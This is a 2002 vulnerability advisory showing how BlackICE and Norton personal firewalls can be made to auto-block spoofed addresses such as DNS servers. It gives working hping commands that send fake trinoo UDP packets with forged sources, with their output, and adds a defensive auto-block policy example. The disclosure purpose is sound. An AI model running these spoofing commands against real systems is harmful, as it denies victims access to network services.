
Multiple Vendor PC Firewall Remote Denial Of Services Vulnerability

by Nikola Strahija on October 10th, 2002

From: Yiming Gong (yiming_at_security.zz.ha.cn)

Overview
In a default installation, some personal firewall software runs with its auto-block function turned on. If someone sends such a PC a forged packet that looks like a high-severity attack and carries a spoofed source address, the firewall immediately blocks the spoofed IP address without any further judgement. An intruder can therefore remotely and quickly block a great many Internet addresses for a victim PC.


Example
The test was run against BlackICE and Norton personal firewall.

Below are the steps and results of the test on BlackICE.

Step 1: A clean, DEFAULT installation of BlackICE Defender for Server (version 2.9.cap) on a Win2k server PC whose IP address is ip.add.of.victim.

Step 2: On a Linux box with hping installed (free software available from www.hping.org), run the following three commands:

---
[[email protected]]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.of.dnsserver
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes
--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[[email protected]]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.google.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes
--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[[email protected]]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.networkice.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes
--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
---
These three commands all do the same thing: they send fake trinoo communication UDP packets to our target machine ip.add.of.victim with a spoofed source IP address (google, networkice, and ip.add.of.dnsserver, our DNS server).

Result: Each time a command is executed, the BlackICE icon in the Windows system tray flashes, and an entry is automatically added to BlackICE's Advanced Firewall Settings that blocks all packets from the spoofed address. The spoofed IP address becomes unreachable immediately.

The test steps and results for Norton personal firewall are almost the same, using hping -e 13 -d 2 -s 6000 -p 2140 -2 ip.of.remote.victimpc -c 2 -a ip.of.spoofed.address instead.
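
An added example, not part of the original advisory and not any vendor's code, of the further judgement an auto-block feature can apply before blocking: never block protected addresses, never block on a source that a single UDP packet merely claims, and let blocks expire. The class names, the policy rules and the sample addresses are assumptions constructed for illustration.

```python
import ipaddress
from dataclasses import dataclass

# All names and addresses here are constructed for illustration
# (RFC 5737 documentation ranges); this is not any vendor's logic.

@dataclass(frozen=True)
class Alert:
    src: str              # source address as claimed in the packet header
    proto: str            # "udp", "tcp" or "icmp"
    handshake_done: bool  # True only after a completed TCP three-way handshake
    signature: str        # IDS signature that fired

class AutoBlockPolicy:
    def __init__(self, protected, ttl=600, max_blocks=256):
        self.protected = [ipaddress.ip_network(n) for n in protected]
        self.ttl = ttl                # seconds; blocks expire on their own
        self.max_blocks = max_blocks  # cap so alerts cannot fill the table
        self.blocks = {}              # blocked address -> expiry time

    def is_blocked(self, ip, now):
        return self.blocks.get(ip, 0) > now

    def decide(self, alert, now):
        # Drop expired entries before judging the new alert.
        self.blocks = {ip: t for ip, t in self.blocks.items() if t > now}
        addr = ipaddress.ip_address(alert.src)
        if any(addr in net for net in self.protected):
            return "alert-only: protected address"
        # A lone UDP/ICMP packet proves nothing about who sent it.
        if alert.proto != "tcp" or not alert.handshake_done:
            return "alert-only: source not verified"
        if len(self.blocks) >= self.max_blocks:
            return "alert-only: block table full"
        self.blocks[alert.src] = now + self.ttl
        return "block"

def demo():
    policy = AutoBlockPolicy(protected=["192.0.2.53/32"], ttl=600)
    alerts = [  # constructed sample alerts
        Alert("192.0.2.53", "udp", False, "trinoo"),    # claims to be the DNS server
        Alert("198.51.100.7", "udp", False, "trinoo"),  # unverifiable UDP source
        Alert("203.0.113.9", "tcp", True, "http-exploit"),
    ]
    return policy, [policy.decide(a, now=1000) for a in alerts]

if __name__ == "__main__":
    for verdict in demo()[1]:
        print(verdict)
```

With this policy the trinoo-style UDP alerts are still logged, but only the source that completed a TCP handshake is blocked, and that block lapses after the TTL.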

Vendor Response
[email protected] and [email protected] were contacted on Sep 24, 2002. Symantec told me they have forwarded my concerns on to the appropriate team, and BlackICE replied that, as the product exists now, there is nothing that can be done to correct this, and that they hope something can be done in a future release.

Affected Versions:
--
Tested products:
BlackICE Defender for server version 2.9.cap
BlackICE Server Protection version 3.5.cdf
Norton personal firewall 2002 (version 4.0)
All are vulnerable.

